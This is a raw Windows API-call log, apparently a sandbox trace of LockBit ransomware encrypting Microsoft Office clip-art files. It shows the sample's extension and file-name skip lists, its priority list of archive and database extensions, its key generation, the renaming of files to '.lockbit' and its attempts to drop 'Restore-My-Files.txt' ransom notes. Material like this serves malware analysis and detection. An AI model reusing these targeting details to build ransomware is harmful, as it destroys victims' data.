0x3ef0008 [0115.698] GetFileSizeEx (in: hFile=0x81c, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=3964) returned 1 [0115.698] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0115.698] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0115.698] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0115.698] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0115.699] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0115.699] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0115.699] ReadFile (in: hFile=0x81c, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0115.702] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01191_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01191_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0115.702] malloc (_Size=0xa6) returned 0x77d7a8 [0115.702] NtSetInformationFile (FileHandle=0x81c, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0115.703] free (_Block=0x77d7a8) [0115.703] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01191_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0115.703] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0115.703] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0115.703] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97014c00, ftCreationTime.dwHighDateTime=0x1bd4bcf, ftLastAccessTime.dwLowDateTime=0x52290670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x97014c00, ftLastWriteTime.dwHighDateTime=0x1bd4bcf, nFileSizeHigh=0x0, nFileSizeLow=0x488, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD01193_.WMF", cAlternateFileName="")) returned 1 [0115.704] lstrcmpiW (lpString1=".", lpString2="FD01193_.WMF") returned -1 [0115.704] lstrcmpiW (lpString1="..", lpString2="FD01193_.WMF") returned -1 [0115.704] PathFindExtensionW (pszPath="FD01193_.WMF") returned=".WMF" [0115.704] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0115.704] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0115.704] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0115.704] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0115.704] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0115.704] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0115.704] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0115.704] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0115.704] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0115.704] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0115.704] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0115.704] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0115.704] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0115.704] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0115.704] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0115.704] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0115.704] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0115.704] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0115.704] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0115.704] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0115.704] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0115.704] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0115.705] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0115.705] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0115.705] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0115.705] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0115.705] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0115.705] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0115.705] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0115.705] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0115.705] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0115.705] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0115.705] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0115.705] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0115.705] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0115.705] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0115.705] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0115.705] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0115.705] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0115.705] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0115.705] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0115.705] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0115.705] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0115.705] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0115.705] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0115.705] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0115.706] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0115.706] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="FD01193_.WMF") returned 1 [0115.706] lstrcmpiW (lpString1="ntldr", lpString2="FD01193_.WMF") returned 1 [0115.706] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="FD01193_.WMF") returned 1 [0115.706] lstrcmpiW (lpString1="bootsect.bak", lpString2="FD01193_.WMF") returned -1 [0115.706] lstrcmpiW (lpString1="autorun.inf", lpString2="FD01193_.WMF") returned -1 [0115.706] lstrcmpiW (lpString1="thumbs.db", lpString2="FD01193_.WMF") returned 1 [0115.706] lstrcmpiW (lpString1="iconcache.db", lpString2="FD01193_.WMF") returned 1 [0115.706] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0115.706] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01193_.WMF") returned=".WMF" [0115.706] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0115.706] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0115.706] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0115.706] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0115.706] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0115.706] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0115.706] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0115.706] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0115.706] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0115.706] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0115.706] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0115.706] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0115.706] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0115.707] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0115.707] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0115.707] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0115.707] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0115.707] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0115.707] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0115.707] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0115.707] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0115.707] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0115.707] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0115.707] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0115.707] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0115.707] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0115.707] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0115.707] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0115.707] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01193_.WMF.lockbit") returned 72 [0115.707] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01193_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01193_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x340 [0115.708] CreateIoCompletionPort (FileHandle=0x340, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0115.708] malloc (_Size=0x40068) returned 0x3e70008 [0115.708] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=1160) returned 1 [0115.708] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0115.709] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0115.709] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0115.709] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0115.709] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0115.709] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0115.709] ReadFile (in: hFile=0x340, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0115.714] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01193_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01193_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0115.714] malloc (_Size=0xa6) returned 0x77d7a8 [0115.714] NtSetInformationFile (FileHandle=0x340, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0115.715] free (_Block=0x77d7a8) [0115.715] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01193_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0115.715] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0115.715] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0115.715] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49e1a200, ftCreationTime.dwHighDateTime=0x1bd4bf0, ftLastAccessTime.dwLowDateTime=0x60c49690, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x49e1a200, ftLastWriteTime.dwHighDateTime=0x1bd4bf0, nFileSizeHigh=0x0, nFileSizeLow=0x91c, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD01196_.WMF", cAlternateFileName="")) returned 1 [0115.715] lstrcmpiW (lpString1=".", lpString2="FD01196_.WMF") returned -1 [0115.715] lstrcmpiW (lpString1="..", lpString2="FD01196_.WMF") returned -1 [0115.715] PathFindExtensionW (pszPath="FD01196_.WMF") returned=".WMF" [0115.715] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0115.715] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0115.715] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0115.715] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0115.715] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0115.715] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0115.715] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0115.715] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0115.716] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0115.716] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0115.716] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0115.716] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0115.716] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0115.716] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0115.716] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0115.716] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0115.716] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0115.716] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0115.716] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0115.716] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0115.716] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0115.716] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0115.716] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0115.716] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0115.716] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0115.716] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0115.716] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0115.716] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0115.717] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0115.717] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0115.717] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0115.717] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0115.717] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0115.717] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0115.717] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0115.717] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0115.717] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0115.717] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0115.717] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0115.717] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0115.717] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0115.717] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0115.717] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0115.717] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0115.717] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0115.717] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0115.717] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0115.717] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="FD01196_.WMF") returned 1 [0115.717] lstrcmpiW (lpString1="ntldr", lpString2="FD01196_.WMF") returned 1 [0115.718] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="FD01196_.WMF") returned 1 [0115.718] lstrcmpiW (lpString1="bootsect.bak", lpString2="FD01196_.WMF") returned -1 [0115.718] lstrcmpiW (lpString1="autorun.inf", lpString2="FD01196_.WMF") returned -1 [0115.718] lstrcmpiW (lpString1="thumbs.db", lpString2="FD01196_.WMF") returned 1 [0115.718] lstrcmpiW (lpString1="iconcache.db", lpString2="FD01196_.WMF") returned 1 [0115.718] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0115.718] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01196_.WMF") returned=".WMF" [0115.718] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0115.718] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0115.718] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0115.718] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0115.718] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0115.718] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0115.718] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0115.718] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0115.718] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0115.718] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0115.718] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0115.718] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0115.718] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0115.718] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0115.719] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0115.719] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0115.719] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0115.719] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0115.719] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0115.719] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0115.719] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0115.719] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0115.719] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0115.719] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0115.719] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0115.719] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0115.719] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0115.719] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0115.719] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01196_.WMF.lockbit") returned 72 [0115.719] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01196_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01196_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c0 [0115.720] CreateIoCompletionPort (FileHandle=0x13c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0115.720] malloc (_Size=0x40068) returned 0x3d70450 [0115.721] GetFileSizeEx (in: hFile=0x13c0, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=2332) returned 1 [0115.721] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0115.722] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0115.722] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0115.722] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0115.722] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0115.722] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0115.722] ReadFile (in: hFile=0x13c0, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0115.729] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01196_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01196_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0115.729] malloc (_Size=0xa6) returned 0x77d7a8 [0115.729] NtSetInformationFile (FileHandle=0x13c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0115.730] free (_Block=0x77d7a8) [0115.730] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01196_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0115.730] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0115.730] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0115.730] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80cfde00, ftCreationTime.dwHighDateTime=0x1bf3242, ftLastAccessTime.dwLowDateTime=0x60c49690, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x80cfde00, ftLastWriteTime.dwHighDateTime=0x1bf3242, nFileSizeHigh=0x0, nFileSizeLow=0x284c, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD01548_.WMF", cAlternateFileName="")) returned 1 [0115.730] lstrcmpiW (lpString1=".", lpString2="FD01548_.WMF") returned -1 [0115.730] lstrcmpiW (lpString1="..", lpString2="FD01548_.WMF") returned -1 [0115.730] PathFindExtensionW (pszPath="FD01548_.WMF") returned=".WMF" [0115.730] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0115.730] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0115.730] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0115.730] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0115.730] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0115.730] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0115.730] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0115.730] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0115.730] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0115.730] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0115.731] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0115.731] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0115.731] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0115.731] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0115.731] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0115.731] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0115.731] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0115.731] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0115.731] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0115.731] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0115.731] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0115.731] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0115.731] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0115.731] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0115.731] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0115.731] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0115.731] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0115.731] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0115.731] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0115.731] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0115.732] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0115.732] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0115.732] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0115.732] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0115.732] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0115.732] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0115.732] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0115.732] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0115.732] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0115.732] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0115.732] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0115.732] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0115.732] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0115.732] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 